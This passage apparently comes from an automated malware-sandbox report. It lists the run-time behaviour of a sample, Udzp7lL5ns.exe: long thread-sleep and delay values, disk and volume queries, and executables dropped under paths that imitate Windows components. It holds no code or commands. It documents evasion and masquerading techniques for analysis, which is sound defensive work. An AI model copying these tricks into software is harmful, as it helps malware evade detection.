                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -585203s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -584797s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -584401s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -583203s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -582656s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -582281s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -581688s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -581360s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -581151s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -580719s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -580203s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -579999s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -579781s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -579641s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -579485s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -579281s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -579135s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -579024s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -578897s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -578735s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -578608s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -578500s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -578382s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -578248s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -578063s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -577500s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -577203s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -576984s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -576823s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -576656s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -576433s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -576173s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -575921s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -575792s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -575672s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -575485s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 1576Thread sleep time: -300000s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -575340s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -574827s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -574680s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -574563s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -574438s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -574313s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -574185s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -574016s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -573885s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -573757s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -573625s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -573438s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -573287s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -573125s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -572954s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -572781s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -572664s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -572078s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -571927s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -571735s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -571593s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -571453s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -571266s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -571094s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -570922s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -570750s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -570624s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -570500s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -570391s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -570265s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -570106s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -569970s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -569272s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -569022s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -568875s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -568758s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -568594s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -568444s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -568297s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -568147s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -567983s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -567846s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -567625s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -567406s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -567156s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -566813s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -566188s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -565953s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -565735s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -565590s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -565451s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -565311s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -565166s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -565042s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -564922s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -564769s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -564531s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -564384s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -564235s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -563699s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -563571s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -563391s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -563252s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -563079s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -562953s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -562799s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -562662s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -562544s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4796Thread sleep time: -562375s >= -30000s
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exe TID: 4072Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exe TID: 7608Thread sleep time: -30000s >= -30000s
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exe TID: 6300Thread sleep time: -922337203685477s >= -30000s
                            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                            Source: C:\Windows\System32\PING.EXELast function: Thread delayed
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeFile Volume queried: C:\ FullSizeInformation
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\Installer\{AC76BA86-1033-1033-7760-BC15014EA700}\ApplicationFrameHost.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Windows\crx\images\LaHYItspByFGQiJUMBgDGadp.exeThread delayed: delay time: 922337203685477Jump to behavior
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\Desktop\Udzp7lL5ns.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 30000
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 922337203685477
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 600000
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 599863
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 599703
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 3600000
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 598781
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 598516
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 598323
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 598104
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 597906
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 597672
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 597391
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 597000
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 595797
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 595500
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 595110
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 594688
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 594328
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 593781
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 592797
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 592235
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 591860
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 591094
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 590485
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 589797
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 589391
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 588953
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 588500
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 588063
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 586563
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 586188
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 585688
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 585203
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 584797
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 584401
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 583203
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 582656
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 582281
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 581688
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 581360
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 581151
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 580719
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 580203
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579999
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579781
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579641
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579485
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579281
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579135
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 579024
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578897
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578735
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578608
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578500
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578382
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578248
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 578063
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 577500
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 577203
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 576984
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 576823
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 576656
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 576433
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 576173
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 575921
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 575792
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 575672
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 575485
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 300000
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 575340
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574827
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574680
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574563
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574438
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574313
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574185
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 574016
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573885
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573757
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573625
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573438
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573287
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 573125
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 572954
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 572781
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 572664
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 572078
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571927
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571735
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571593
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571453
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571266
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 571094
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570922
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570750
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570624
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570500
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570391
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570265
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 570106
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 569970
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 569272
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 569022
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568875
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568758
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568594
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568444
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568297
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 568147
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 567983
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 567846
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 567625
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 567406
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 567156
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 566813
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 566188
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565953
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565735
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565590
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565451
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565311
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565166
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 565042
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 564922
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 564769
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 564531
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 564384
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 564235
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 563699
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 563571
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 563391
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 563252
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 563079
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 562953
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 562799
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 562662
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 562544
                            Source: C:\Program Files (x86)\Windows Mail\Memory Compression.exeThread delayed: delay time: 562375
